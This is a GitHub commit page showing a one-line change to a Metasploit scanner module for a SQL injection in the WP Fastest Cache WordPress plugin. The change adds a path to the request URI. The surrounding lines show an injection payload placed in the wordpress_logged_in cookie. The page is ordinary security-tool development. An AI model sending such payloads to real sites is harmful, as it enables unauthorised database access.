We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent a87e915 commit 36162abCopy full SHA for 36162ab
modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -58,7 +58,7 @@ def run_host(_ip)
58
res = send_request_cgi({
59
'method' => 'GET',
60
'cookie' => "wordpress_logged_in=\" AND (SELECT #{random_number} FROM (SELECT(#{payload}))#{random_table}) AND \"#{random_string}\"=\"#{random_string}",
61
- 'uri' => normalize_uri(target_uri.path)
+ 'uri' => normalize_uri(target_uri.path, 'wp-admin.php')
62
})
63
fail_with Failure::Unreachable, 'Connection failed' unless res
64
end
0 commit comments